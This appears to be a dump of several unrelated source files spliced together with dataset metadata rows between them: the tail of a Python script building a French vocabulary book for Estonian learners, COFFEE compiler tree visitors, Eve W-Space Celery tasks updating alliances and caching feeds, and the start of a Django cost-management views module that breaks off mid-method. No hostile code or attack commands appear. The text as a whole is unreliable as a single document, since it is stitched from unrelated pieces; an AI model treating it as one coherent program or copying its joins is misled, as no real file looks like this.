les Côtes d'Auvergne [kootə do'värnjə] : -
""")
if FULL_CONTENT:
General.add_lesson(u"Omadussõnad (üld)", intro=u"""
Omadussõnad, mis lõpevad "e"-ga, ei muutu soo järgi.
""",columns=[M, F, ET])
General.parse_words(Adjectif,u"""
chaud [šoo] | chaude [šoodə] : kuum
froid [fru'a] | froide [fru'aadə] : külm
gros [gro] | grosse [grossə] : paks
mince (mf) [mÄ~s] : õhuke
bon [bO~] | bonne [bonnə] : hea
beau [boo] | belle [bälə] : ilus
joli [žo'li] | jolie [žo'lii] : ilus
demi [də'mi] | demie [də'mii]: pool
entier [A~'tjee] | entière [A~'tjäär] : terve, täis
double (mf) ['duublə] : topelt
facile (mf) [fa'sil] : lihtne
possible (mf) [po'siblə] : võimalik
""")
General.add_lesson(u"Loeme kümneni", intro=u"""""")
General.parse_words(Numerique,u"""
un [Ö~] : üks
deux [döö] : kaks
trois [trwa] : kolm
quatre [katrə] : neli
cinq [sÄ~k] : viis
six [sis] : kuus
sept [sät] : seitse
huit [üit] : kaheksa
neuf [nÖf] : üheksa
dix [dis] : kümme
""")
General.add_lesson(u"Värvid", columns=[M, F, ET])
General.parse_words(Adjectif,u"""
brun [brÖ~] | brune [brün] : pruun
vert [väär] | verte [värtə] : roheline
bleu [blöö] | bleue [blöö] : sinine
rouge (mf) [ruuž] : punane
jaune (mf) [žoon] : kollane
blond [blO~] | blonde [blO~də] : blond
beige (mf) [bääž] : beež
orange (mf) [o'rA~ž] : oranž
blanc [blA~] | blanche [blA~š] : valge
noir [nwaar] | noire [nwaar] : must
""")
General.add_lesson(u"Kuud")
General.parse_words(NomPropre,u"""
janvier [žA~vi'ee] : jaanuar
février [fevri'ee] : veebruar
mars [mars] : märts
avril [a'vril] : aprill
mai [mä] : mai
juin [žwÄ~] : juuni
juillet [žwi'jä] : juuli
août [ut] : august
septembre [sep'tA~brə] : september
octobre [ok'tOObrə] : oktoober
novembre [no'vA~brə] : november
décembre [de'sA~brə] : detsember
""")
u"""
On met une majuscule
uniquement quand l'adjectif est employé comme
nom pour désigner une personne.
Ex. : Les Français parlent en français à leurs amis français
"""
General.add_lesson(u"Riigid",columns=[GEON("Riik"), GEOM, GEOF, ET])
General.parse_words(None,u"""
la France [frA~s] | français [frA~'sä] | française [frA~'sääz] : Prantsusmaa
l'Estonie (f) [ästo'nii] | estonien [esto'njÄ~] | estonienne [esto'njän] : Eesti
l'Allemagne (f) [al'manjə] | allemand [al'mA~]| allemande [al'mA~də] : Saksamaa
l'Angleterre (f) [A~glə'täär] | anglais [A~'glä]| anglaise [A~'glääz] : Inglismaa
la Belgique [bel'žik] | belge [belžə]| belge [belžə] : Belgia
la *Hollande [o'lA~də] | hollandais [olA~'dä] | hollandaise [olA~'dääz] : Holland
l'Espagne (f) [es'panjə] | espagnol [espan'jol] | espagnole [espan'jol] : Hispaania
l'Italie (f) [ita'lii] | italien [ital'jÄ~]| italienne [ital'jen] : Itaalia
""")
if FULL_CONTENT:
General.add_lesson(u"Kuulsad inimesed")
General.parse_words(NomPropre,u"""
Jacques Chirac [žaak ši'rak] : # endine president
Georges Brassens [žorž bra'sÄ~s] : # laulja
Brigitte Bardot [bri'žit bar'do] : # laulja
Louis de Funès [lu'i də fü'nääz] : # näitleja
""")
General.add_lesson(u"Majad ja nende osad")
General.parse_words(Nom,u"""
la maison [mä'zO~] : maja
la cave [kaav] : kelder
la cuisine [kwi'zin] : köök
la salle de bain [sal də bÄ~] : vannituba
la chambre à coucher [šA~mbrə a ku'šee] : magamistuba
le salon [sa'lO~] : elutuba
un escalier [eskal'jee] : trepp
la fenêtre [fə'näätrə] : aken
le parterre [par'täär] : esimene korrus
le premier étage [prəm'jeer_etaaž] : teine korrus
le jardin [žar'dÄ~] : aed
""")
if FULL_CONTENT:
Fun.add_lesson(u"Devinettes", intro=u"""
#. Que dit un vampire en quittant sa victime?
-- Merci beau cou.
#. Pourquoi les marins se marient-ils ?
-- Pour avoir une belle mer (mère).
""")
Fun.add_lesson(u"Virelangues", intro=u"""
#. Un chasseur sachant chasser doit savoir chasser sans son chien. ([ref s])
#. Chacun cherche son chat.
#. Poisson sans boisson est poison.
#. Ecartons ton carton, car ton carton me gêne.
#. Ton thé t'a-t-il ôté ta toux?
#. Tante, en ton temps teintais-tu tes tempes?
#. Les poules couvent souvent au couvent.
""")
Fun.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
le poison [pwa'zO~] : mürk
la boisson [bwa'sO~] : jook
le chasseur [ša'sÖÖr] : jahimees
le chien [šiÄ~] : koer
la toux [tu] : köha
""")
Fun.parse_words(Verbe,u"""
savoir [sa'vuaar] : teadma | oskama
chercher [šär'šee] : otsima
écarter [ekar'tee] : eest ära liigutama
ôter [oo'tee] : ära võtma
""")
Fun.parse_words(Autre,u"""
sans [sA~] : ilma
chacun [ša'kÖ~] : igaüks
""")
if FULL_CONTENT:
General.add_lesson(u"Lisa", intro=u"""
""")
General.parse_words(Autre,u"""
environ [A~vi'rO~] : umbes
facilement [fasil'mA~] : lihtsalt
rapidement [rapidə'mA~]: kiiresti
le autre [ootrə] : teine
le même [määm] : sama
""")
General.parse_words(Verbe,u"""
filer [fi'lee] : ketrama
baiser [bä'zee] : musitama
sauter [soo'tee] : hüppama
""")
General.parse_words(Nom,u"""
le midi [mi'di] : lõuna | keskpäev
le soir [swaar] : õhtu
le matin [ma'tÄ~] : hommik
la tranche [trA~š] : lõik | viilukas
la coupe [kupp] : lõikamine | pokaal
la ébullition [ebüjis'jO~] : keemine
le feu [föö] : tuli
le baiser [bä'zee] : suudlus
le appétit [appe'ti] : isu
""")
unused = u"""
une aurore [or'Or] : koit
le fil [fil] : niit | lõng | nöör
une heure [ÖÖr] : tund
le dauphinois [dofinw'a] : lõunaprantsuse dialekt
"""
if HAS_EXERCICES:
Exercices.add_lesson(u"Lugeda oskad?", u"""
Õpetaja kirjutab tahvlile sarja hääldamiskirjeldusi.
Õpilased loevad ette.
Ainult lugeda, mitte tõlkida.
""")
Exercices.parse_words(None,u"""
au clair de lune [okläärdə'lün] : kuuvalguses
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le dessert [des'säär] : magustoit
la mousse au chocolat [musošoko'la] : šokoladivaht
le pot-au-feu [poto'föö] : ühepajatoit
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
la sauce chasseur [soos ša'sÖÖr] : jahimehe kaste
Poitou [pwa'tu] : -
la sauce italienne [soos ital'jän] : itaalia kaste
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
""")
Exercices.add_lesson(u"Kirjutada oskad?", u"""
Õpetaja loeb ette sarja sõnu.
Õpilased kirjutavad paberile, kasutades hääldamiskirjelduse tähestikku.
""")
Exercices.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le soleil [so'leij] : päike
la boisson [bwa'sO~] : jook
le poisson [pwa'sO~] : kala
le requin [rə'kÄ~] : haikala
la cuillère [kwi'jäär] : lusikas
""")
if output_format == "rst":
Files = book.add_section(u"Failid",intro=u"""
Neid faile saad alla laadida ja kuulata koos trükitud lehtedega:
- `lk. 5 <dl/lk05.mp3>`_
- `lk. 6 <dl/lk06.mp3>`_
- `lk. 7 <dl/lk07.mp3>`_
- `lk. 8 <dl/lk08.mp3>`_
""")
if __name__ == '__main__':
if output_format == "rst":
book.add_index(u"Sõnaraamat")
book.write_rst_files(sys.argv[2])
elif output_format == "odt":
if False:
book.add_dictionary(u"Sõnade nimekiri")
fn = sys.argv[2]
book.write_odt_file(fn)
os.startfile(fn)
| gpl-3.0 | -9,100,418,341,294,364,000 | 25.385458 | 133 | 0.611523 | false | 1.989088 | false | false | false |
gmarkall/COFFEE | coffee/visitors/utilities.py | 1 | 13166 | from __future__ import absolute_import
import itertools
import operator
from copy import deepcopy
from collections import OrderedDict, defaultdict
import numpy as np
from coffee.visitor import Visitor
from coffee.base import Sum, Sub, Prod, Div, ArrayInit, SparseArrayInit
from coffee.utils import ItSpace, flatten
__all__ = ["ReplaceSymbols", "CheckUniqueness", "Uniquify", "Evaluate",
"EstimateFlops", "ProjectExpansion"]
class ReplaceSymbols(Visitor):
"""Replace named symbols in a tree, returning a new tree.
:arg syms: A dict mapping symbol names to new Symbol objects.
:arg key: a callable to generate a key from a Symbol, defaults to
the string representation.
:arg copy_result: optionally copy the new Symbol whenever it is
used (guaranteeing that it will be unique)"""
def __init__(self, syms, key=lambda x: str(x),
copy_result=False):
self.syms = syms
self.key = key
self.copy_result = copy_result
super(ReplaceSymbols, self).__init__()
def visit_Symbol(self, o):
try:
ret = self.syms[self.key(o)]
if self.copy_result:
ops, okwargs = ret.operands()
ret = ret.reconstruct(ops, **okwargs)
return ret
except KeyError:
return o
def visit_object(self, o):
return o
visit_Node = Visitor.maybe_reconstruct
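# Hedged usage sketch (not from the original file): rename every Symbol "a"
# in a tree to "b"; assumes coffee.base.Symbol, which visit_Symbol above
# already relies on.
def _replace_a_with_b(tree):
    from coffee.base import Symbol  # local import keeps the sketch self-contained
    replacer = ReplaceSymbols({"a": Symbol("b")}, copy_result=True)
    # copy_result=True hands back a fresh Symbol at each substitution site, so
    # the rewritten tree also satisfies CheckUniqueness below.
    return replacer.visit(tree)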
class CheckUniqueness(Visitor):
"""
Check if all nodes in a tree are unique instances.
"""
def visit_object(self, o, seen=None):
return seen
# Some lists appear in operands()
def visit_list(self, o, seen=None):
        # Walk list entries
for entry in o:
seen = self.visit(entry, seen=seen)
return seen
def visit_Node(self, o, seen=None):
if seen is None:
seen = set()
ops, _ = o.operands()
for op in ops:
seen = self.visit(op, seen=seen)
if o in seen:
raise RuntimeError("Tree does not contain unique nodes")
seen.add(o)
return seen
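# Example (a sketch; the Sum/Symbol construction below is an assumption about
# coffee.base's constructors):
#
#   shared = Symbol("a")
#   CheckUniqueness().visit(Sum(shared, shared))   # raises RuntimeError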
class Uniquify(Visitor):
"""
Uniquify all nodes in a tree by recursively calling reconstruct
"""
visit_Node = Visitor.always_reconstruct
def visit_object(self, o):
return deepcopy(o)
def visit_list(self, o):
return [self.visit(e) for e in o]
class Evaluate(Visitor):
    """
    Symbolically evaluate an expression enclosed in a loop nest, provided that
    all of the symbols involved are constants and their value is known.
    Return a dictionary mapping symbol names to (newly created) Decl nodes, each
    declaration being initialized with a proper (newly computed and created)
    ArrayInit object.
    :arg decls: dictionary mapping symbol names to known Decl nodes.
    :arg track_zeros: True if the evaluated arrays are expected to be block-sparse
        and the pattern of zeros should be tracked.
    """
    @classmethod
    def default_retval(cls):
        return OrderedDict()
default_args = dict(loop_nest=[])
def __init__(self, decls, track_zeros):
self.decls = decls
self.track_zeros = track_zeros
self.mapper = {
Sum: np.add,
Sub: np.subtract,
Prod: np.multiply,
Div: np.divide
}
from coffee.vectorizer import vect_roundup, vect_rounddown
self.up = vect_roundup
self.down = vect_rounddown
super(Evaluate, self).__init__()
def visit_object(self, o, *args, **kwargs):
return self.default_retval()
def visit_list(self, o, *args, **kwargs):
ret = self.default_retval()
for entry in o:
ret.update(self.visit(entry, *args, **kwargs))
return ret
def visit_Node(self, o, *args, **kwargs):
ret = self.default_retval()
for n in o.children:
ret.update(self.visit(n, *args, **kwargs))
return ret
def visit_For(self, o, *args, **kwargs):
nest = kwargs.pop("loop_nest")
kwargs["loop_nest"] = nest + [o]
return self.visit(o.body, *args, **kwargs)
def visit_Writer(self, o, *args, **kwargs):
lvalue = o.children[0]
writes = [l for l in kwargs["loop_nest"] if l.dim in lvalue.rank]
        # Evaluate the expression for each point in the n-dimensional space
# represented by /writes/
dims = tuple(l.dim for l in writes)
shape = tuple(l.size for l in writes)
values, precision = np.zeros(shape), None
for i in itertools.product(*[range(j) for j in shape]):
point = {d: v for d, v in zip(dims, i)}
expr_values, precision = self.visit(o.children[1], point=point, *args, **kwargs)
# The sum takes into account reductions
values[i] = np.sum(expr_values)
# If values is not expected to be block-sparse, just return
if not self.track_zeros:
return {lvalue: ArrayInit(values)}
# Sniff the values to check for the presence of zero-valued blocks: ...
        # ... set default nonzero pattern
nonzero = [[(i, 0)] for i in shape]
# ... track nonzeros in each dimension
nonzeros_bydim = values.nonzero()
mapper = []
for nz_dim in nonzeros_bydim:
mapper_dim = defaultdict(set)
for i, nz in enumerate(nz_dim):
point = []
# ... handle outer dimensions
for j in nonzeros_bydim[:-1]:
if j is not nz_dim:
point.append((j[i],))
# ... handle the innermost dimension, which is treated "specially"
# to retain data alignment
for j in nonzeros_bydim[-1:]:
if j is not nz_dim:
point.append(tuple(range(self.down(j[i]), self.up(j[i]+1))))
mapper_dim[nz].add(tuple(point))
mapper.append(mapper_dim)
for i, dim in enumerate(mapper[:-1]):
# Group indices iff contiguous /and/ same codomain
ranges = []
grouper = lambda (m, n): (m-n, dim[n])
for k, g in itertools.groupby(enumerate(sorted(dim.keys())), grouper):
group = map(operator.itemgetter(1), g)
ranges.append((group[-1]-group[0]+1, group[0]))
nonzero[i] = ranges or nonzero[i]
# Group indices in the innermost dimension iff within vector length size
ranges, grouper = [], lambda n: self.down(n)
for k, g in itertools.groupby(sorted(mapper[-1].keys()), grouper):
group = list(g)
ranges.append((group[-1]-group[0]+1, group[0]))
nonzero[-1] = ItSpace(mode=1).merge(ranges or nonzero[-1], within=-1)
return {lvalue: SparseArrayInit(values, precision, tuple(nonzero))}
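    # Illustrative helper (an assumption, not part of the original API): the
    # same enumerate/groupby trick used in visit_Writer above, isolated so the
    # (size, offset) encoding of contiguous runs is easy to see.
    def _contiguous_runs_example(self, indices):
        """Sketch only: [0, 1, 2, 6, 7] -> [(3, 0), (2, 6)]."""
        runs = []
        for _, g in itertools.groupby(enumerate(sorted(indices)),
                                      lambda (i, n): n - i):
            group = map(operator.itemgetter(1), g)
            # each run is stored as (number of indices, first index)
            runs.append((group[-1] - group[0] + 1, group[0]))
        return runs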
def visit_BinExpr(self, o, *args, **kwargs):
ops, _ = o.operands()
transformed = [self.visit(op, *args, **kwargs) for op in ops]
if any([a is None for a in transformed]):
return
values, precisions = zip(*transformed)
# Precisions must match
assert precisions.count(precisions[0]) == len(precisions)
# Return the result of the binary operation plus forward the precision
return self.mapper[o.__class__](*values), precisions[0]
def visit_Par(self, o, *args, **kwargs):
return self.visit(o.child, *args, **kwargs)
def visit_Symbol(self, o, *args, **kwargs):
try:
# Any time a symbol is encountered, we expect to know the /point/ of
# the iteration space which is being evaluated. In particular,
# /point/ is pushed (and then popped) on the environment by a Writer
# node. If /point/ is missing, that means the root of the visit does
# not enclose the whole iteration space, which in turn indicates an
# error in the use of the visitor.
point = kwargs["point"]
except KeyError:
raise RuntimeError("Unknown iteration space point.")
try:
decl = self.decls[o.symbol]
except KeyError:
raise RuntimeError("Couldn't find a declaration for symbol %s" % o)
try:
values = decl.init.values
precision = decl.init.precision
shape = values.shape
except AttributeError:
raise RuntimeError("%s not initialized with a numpy array" % decl)
sliced = 0
for i, (r, s) in enumerate(zip(o.rank, shape)):
dim = i - sliced
# Three possible cases...
if isinstance(r, int):
# ...the index is used to access a specific dimension (e.g. A[5][..])
values = values.take(r, dim)
sliced += 1
elif r in point:
# ...a value is being evaluated along dimension /r/ (e.g. A[r] = B[..][r])
values = values.take(point[r], dim)
sliced += 1
else:
# .../r/ is a reduction dimension
values = values.take(range(s), dim)
return values, precision
class ProjectExpansion(Visitor):
    """
    Project the output of expression expansion.
    The caller should provide a collection of symbols C. The expression tree (nodes
    that are not of type :class:`~.Expr` are not allowed) is visited and a set of
    tuples returned, one tuple for each symbol in C. Each tuple represents the subset
    of symbols in C that will appear in at least one term after expansion.
    For example, let C = [a, b], and consider the following input expression: ::
        (a*c + d*e)*(b*c + b*f)
    After expansion, the expression becomes: ::
        a*c*b*c + a*c*b*f + d*e*b*c + d*e*b*f
    in which there are four product terms. Of these, two contain both 'a' and
    'b', and two contain only 'b'. So the visit will return [(a, b), (b,)].
    :arg symbols: the collection of symbols searched for
    """
    @classmethod
    def default_retval(cls):
        return list()
def __init__(self, symbols):
self.symbols = symbols
super(ProjectExpansion, self).__init__()
def visit_object(self, o, *args, **kwargs):
return self.default_retval()
def visit_Expr(self, o, parent=None, *args, **kwargs):
projection = self.default_retval()
for n in o.children:
projection.extend(self.visit(n, parent=o, *args, **kwargs))
ret = []
for n in projection:
if n not in ret:
ret.append(n)
return ret
def visit_Prod(self, o, parent=None, *args, **kwargs):
if isinstance(parent, Prod):
projection = self.default_retval()
for n in o.children:
projection.extend(self.visit(n, parent=o, *args, **kwargs))
return [list(flatten(projection))]
else:
# Only the top level Prod, in a chain of Prods, should do the
# tensor product
projection = [self.visit(n, parent=o, *args, **kwargs) for n in o.children]
product = itertools.product(*projection)
ret = [list(flatten(i)) for i in product] or projection
return ret
def visit_Symbol(self, o, *args, **kwargs):
return [[o.symbol]] if o.symbol in self.symbols else [[]]
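# Hedged usage sketch mirroring the docstring example above (symbol and tree
# construction elided; the exact call shape is an assumption):
#
#   expr = Prod(Sum(Prod(a, c), Prod(d, e)), Sum(Prod(b, c), Prod(b, f)))
#   ProjectExpansion(["a", "b"]).visit(expr)   # -> [['a', 'b'], ['b']]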
class EstimateFlops(Visitor):
"""
Estimate the number of floating point operations a tree performs.
Does not look inside flat blocks, and all function calls are
assumed flop free, so this probably underestimates the number of
flops performed.
Also, these are "effective" flops, since the compiler may do fancy
things.
"""
def visit_object(self, o, *args, **kwargs):
return 0
def visit_list(self, o, *args, **kwargs):
return sum(self.visit(e) for e in o)
def visit_Node(self, o, *args, **kwargs):
ops, _ = o.operands()
return sum(self.visit(op) for op in ops)
def visit_BinExpr(self, o, *args, **kwargs):
ops, _ = o.operands()
return 1 + sum(self.visit(op) for op in ops)
def visit_AVXBinOp(self, o, *args, **kwargs):
ops, _ = o.operands()
return 4 + sum(self.visit(op) for op in ops)
def visit_Assign(self, o, *args, **kwargs):
ops, _ = o.operands()
return sum(self.visit(op) for op in ops[1:])
def visit_AugmentedAssign(self, o, *args, **kwargs):
ops, _ = o.operands()
return 1 + sum(self.visit(op) for op in ops[1:])
def visit_For(self, o, *args, **kwargs):
body_flops = sum(self.visit(b) for b in o.body)
return (o.size / o.increment) * body_flops
def visit_Invert(self, o, *args, **kwargs):
ops, _ = o.operands()
n = ops[1].symbol
return n**3
def visit_Determinant1x1(self, o, *args, **kwargs):
return 1
def visit_Determinant2x2(self, o, *args, **kwargs):
return 3
def visit_Determinant3x3(self, o, *args, **kwargs):
return 14
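    # Where these constants come from (a rough count assuming cofactor
    # expansion): the 2x2 case is 2 multiplications + 1 subtraction = 3 flops;
    # the 3x3 case is 9 multiplications + 5 additions/subtractions = 14.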
| bsd-3-clause | -2,043,333,322,198,643,500 | 34.297587 | 92 | 0.584764 | false | 3.894114 | false | false | false |
teknick/eve-wspace | evewspace/core/tasks.py | 3 | 6163 | # Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from celery import task
from django.core.cache import cache
import urllib
import json
from models import Alliance, Corporation, NewsFeed
from API import utils as handler
import eveapi
import feedparser
@task()
def update_alliance(allianceID):
"""
    Updates an alliance and its corporations from the API.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
allianceapi = api.eve.AllianceList().alliances.Get(allianceID)
if Alliance.objects.filter(id=allianceID).count():
# Alliance exists, update it
for corp in allianceapi.memberCorporations:
try:
update_corporation(corp.corporationID)
except AttributeError:
# Pass on this exception because one Russian corp has an
# unavoidable bad character in their description
pass
alliance = Alliance.objects.get(id=allianceID)
alliance.name = allianceapi.name
alliance.shortname = allianceapi.shortName
# Check to see if we have a record for the executor
if Corporation.objects.filter(id=allianceapi.executorCorpID).count():
alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
else:
# Alliance doesn't exists, add it without executor, update corps
# and then update the executor
alliance = Alliance(id=allianceapi.allianceID, name=allianceapi.name,
shortname=allianceapi.shortName, executor=None)
alliance.save()
for corp in allianceapi.memberCorporations:
try:
update_corporation(corp.corporationID)
except AttributeError:
                # Skip corps whose data contains malformed characters
                # (same issue as above)
pass
try:
# If an alliance's executor can't be processed for some reason,
# set it to None
alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
except:
alliance.executor = None
alliance.save()
@task()
def update_corporation(corpID, sync=False):
"""
    Updates a corporation from the API. If its alliance doesn't exist,
update that as well.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
    # Encapsulate this in a try block because one corp has a malformed
    # character that chokes eveapi
try:
corpapi = api.corp.CorporationSheet(corporationID=corpID)
except:
raise AttributeError("Invalid Corp ID or Corp has malformed data.")
if corpapi.allianceID:
try:
alliance = Alliance.objects.get(id=corpapi.allianceID)
except:
# If the alliance doesn't exist, we start a task to add it
# and terminate this task since the alliance task will call
# it after creating the alliance object
if not sync:
update_alliance.delay(corpapi.allianceID)
return
else:
# Something is waiting and requires the corp object
# We set alliance to None and kick off the
# update_alliance task to fix it later
alliance = None
update_alliance.delay(corpapi.allianceID)
else:
alliance = None
if Corporation.objects.filter(id=corpID).count():
# Corp exists, update it
corp = Corporation.objects.get(id=corpID)
corp.member_count = corpapi.memberCount
corp.ticker = corpapi.ticker
corp.name = corpapi.corporationName
corp.alliance = alliance
corp.save()
else:
# Corp doesn't exist, create it
corp = Corporation(id=corpID, member_count=corpapi.memberCount,
name=corpapi.corporationName, alliance=alliance)
corp.save()
return corp
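# Usage sketch (illustrative; 98000001 is a made-up corp ID):
#
#   update_corporation.delay(98000001)              # asynchronous, fire-and-forget
#   corp = update_corporation(98000001, sync=True)  # inline, returns the Corporation
#
# With sync=True a missing alliance is left as None and repaired later by the
# queued update_alliance task, as the code above shows.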
@task()
def update_all_alliances():
"""
Updates all corps in all alliances. This task will take a long time
to run.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
alliancelist = api.eve.AllianceList()
for alliance in alliancelist.alliances:
update_alliance(alliance.allianceID)
@task()
def cache_eve_reddit():
"""
Attempts to cache the top submissions to r/Eve.
"""
current = cache.get('reddit')
if not current:
# No reddit data is cached, grab it.
data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
cache.set('reddit', data, 120)
else:
# There is cached data, let's try to update it
data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
if 'data' in data:
# Got valid response, store it
cache.set('reddit', data, 120)
else:
# Invalid response, refresh current data
cache.set('reddit', current, 120)
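# Reading the cached payload elsewhere (a sketch; the key matches the set()
# calls above, and the listing shape is reddit's standard JSON):
#   data = cache.get('reddit')
#   if data and 'data' in data:
#       posts = data['data']['children']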
@task
def update_feeds():
"""
Caches and updates RSS feeds in NewsFeeds.
"""
for feed in NewsFeed.objects.all():
try:
data = feedparser.parse(feed.url)
cache.set('feed_%s' % feed.pk, data, 7200)
feed.name = data['feed']['title']
feed.description = data['feed']['subtitle']
feed.save()
except:
# There shouldn't be any exceptions, but we want to continue
# if there are.
pass
| gpl-3.0 | 887,700,468,034,383,200 | 36.809816 | 88 | 0.636703 | false | 3.94811 | false | false | false |
infoINGenieria/Zweb | z_web/costos/views.py | 1 | 20488 | # coding: utf-8
from functools import partial, wraps
from django.apps import apps
from django.contrib import messages
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.core.urlresolvers import reverse, reverse_lazy
from django.db import IntegrityError, models
from django.db.transaction import atomic
from django.views.generic import TemplateView, CreateView, ListView, UpdateView, DeleteView
from django.forms.utils import ErrorList
from django.forms.formsets import formset_factory
from django.http import HttpResponseRedirect
from django.utils.safestring import mark_safe
from django.shortcuts import render
from core.models import Obras, UserExtension
from parametros.models import Periodo, FamiliaEquipo
from zweb_utils.mixins import TableFilterListView, ModalViewMixin
from zweb_utils.views import LoginAndPermissionRequiredMixin
from .models import (CostoParametro, Costo, CostoTipo, AvanceObra)
from .forms import (CostoItemForm, CostoItemFamiliaForm,
CopiaCostoForm, CostoCCForm, PeriodoCCForm, PeriodoCostoTipoForm,
CostoEquipoForm, CostoEditPorCCForm, CostoEditPorEquipoForm,
AvanceObraEditForm, CentroCostoSelectForm, AvanceObraCreateForm)
from .tables import (CostoTableGeneric, CostosByCCTotalTable,
CostosByEquipoMontoHSTable, AvanceObraTable)
from .filters import CostosFilter, AvanceObraFilter
class BaseCostosMixin(LoginAndPermissionRequiredMixin):
permission_required = 'costos.can_manage_costos'
permission_denied_message = "No posee los permisos suficientes para ingresar a esa sección"
raise_exception = True
class FormWithUserMixin(object):
def get_form_kwargs(self):
kwargs = super(FormWithUserMixin, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class CopiaCostosView(BaseCostosMixin, TemplateView):
"""
    View for copying costs from one period to another.
"""
template_name = "frontend/costos/copiar_costos.html"
def get_context_data(self, **kwargs):
context = super(CopiaCostosView, self).get_context_data(**kwargs)
if 'copia_form' not in kwargs:
context["copia_form"] = CopiaCostoForm()
return context
def post(self, request, *args, **kwargs):
p_form = CopiaCostoForm(self.request.POST)
if p_form.is_valid():
return self.form_valid(p_form)
else:
return self.form_invalid(p_form)
def form_invalid(self, p_form):
return self.render_to_response(
self.get_context_data(copia_form=p_form))
def form_valid(self, form):
tipos = form.cleaned_data["tipo_costos"]
        de_periodo = form.cleaned_data["de_periodo"]
a_periodo = form.cleaned_data["a_periodo"]
recalcular = form.cleaned_data["recalcular"]
if recalcular:
try:
des_param = CostoParametro.objects.get(periodo=a_periodo)
# ori_param = CostoParametro.objects.get(periodo=de_periodo)
except CostoParametro.DoesNotExist:
messages.add_message(self.request, messages.ERROR,
mark_safe("Asegúrese de definir los <b><a href='{}'>parámetros "
"de costos</a></b> para ambos periodos seleccionados.".format(
reverse('admin:costos_costoparametro_changelist'))))
return self.form_invalid(form)
copia_dict = dict()
for tipo_costo in tipos:
with atomic():
for obj in Costo.objects.filter(tipo_costo=tipo_costo, periodo=de_periodo):
try:
if tipo_costo not in copia_dict:
copia_dict[tipo_costo] = True
obj.pk = None
if recalcular:
obj.recalcular_valor(des_param)
obj.periodo = a_periodo
obj.clean()
obj.save()
except (IntegrityError, ValidationError):
copia_dict[tipo_costo] = False
for tipo_costo in tipos:
if tipo_costo in copia_dict:
if copia_dict[tipo_costo]:
messages.add_message(
self.request, messages.SUCCESS,
mark_safe("Se crearon ítems de <b>{}</b> para el periodo {}".format(tipo_costo.nombre, a_periodo)))
else:
messages.add_message(
self.request, messages.WARNING,
mark_safe("Hecho! Existían previamente ítems de <b>{}</b> para el periodo {}. Puede editarlos haciendo clic <a href='{}?tipo_costo={}&periodo={}'><b>acá</b></a>.".format(
tipo_costo, a_periodo, reverse('costos:costos_list'), tipo_costo.pk, a_periodo.pk)))
else:
messages.add_message(
self.request, messages.WARNING,
mark_safe("No existen ítems de <b>{}</b> para el periodo {}".format(tipo_costo, de_periodo)))
return HttpResponseRedirect(reverse('costos:copia_costos'))
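# Copy idiom used above (a sketch): a Django model instance is duplicated by
# clearing its primary key before save(), which forces an INSERT instead of an
# UPDATE; any IntegrityError/ValidationError inside atomic() rolls back the
# whole tipo_costo batch:
#   obj.pk = None
#   obj.periodo = a_periodo
#   obj.save()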
class CostosList(BaseCostosMixin, TableFilterListView):
template_name = 'frontend/costos/costo_list.html'
filterset_class = CostosFilter
model = Costo
def get_filterset(self, *args, **kwargs):
"""
        Only show cost centers belonging to the user's business unit.
"""
fs = super(CostosList, self).get_filterset(*args, **kwargs)
fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
return fs
def get_queryset(self):
uns = UserExtension.get_unidades_negocio(self.request.user)
        if uns.filter(codigo='OS').exclude(codigo='MS').exists():  # OS has no per-equipment costs
return Costo.objects.filter(
centro_costo__in=Obras.get_centro_costos(self.request.user))
elif uns.filter(codigo='MS').exclude(codigo='OS').exists():
return Costo.objects.filter(
models.Q(centro_costo__in=Obras.get_centro_costos(self.request.user)) |
models.Q(centro_costo__isnull=True))
        # any other case
return Costo.objects.all()
def get_table_class(self, **kwargs):
if self.filterset.form.is_valid():
tipo_costo = self.filterset.form.cleaned_data["tipo_costo"]
relacionado_con = self.filterset.form.cleaned_data["relacionado_con"]
if tipo_costo:
return CostosByCCTotalTable if tipo_costo.es_por_cc else CostosByEquipoMontoHSTable
if relacionado_con:
return CostosByCCTotalTable if relacionado_con == 'cc' else CostosByEquipoMontoHSTable
return CostoTableGeneric
def get_context_data(self, **kwargs):
ctx = super(CostosList, self).get_context_data(**kwargs)
ctx["is_filtered"] = self.filterset.form.is_valid()
return ctx
class CostosAltaCC(BaseCostosMixin, TemplateView):
model = Costo
template_name = "frontend/costos/costos_cc_form.html"
def _form_class(self):
return PeriodoCCForm
def _get_formset(self):
return formset_factory(CostoCCForm, extra=0)
def get_context_data(self, **kwargs):
context = super(CostosAltaCC, self).get_context_data(**kwargs)
context["tipos_costos"] = self.get_queryset()
if "p_form" not in kwargs:
context["p_form"] = self._form_class()(self.request.user)
if "formsets" not in kwargs:
Formset = self._get_formset()
initial = [{'tipo_costo': x.pk} for x in context["tipos_costos"]]
context["formsets"] = Formset(initial=initial)
return context
def get_queryset(self, **kwargs):
return CostoTipo.objects.filter(relacionado_con='cc')
def post(self, request, *args, **kwargs):
p_form = self._form_class()(self.request.user, self.request.POST)
formsets = self._get_formset()(self.request.POST)
if p_form.is_valid() and formsets.is_valid():
return self.form_valid(p_form, formsets)
else:
return self.form_invalid(p_form, formsets)
def form_invalid(self, p_form, formsets):
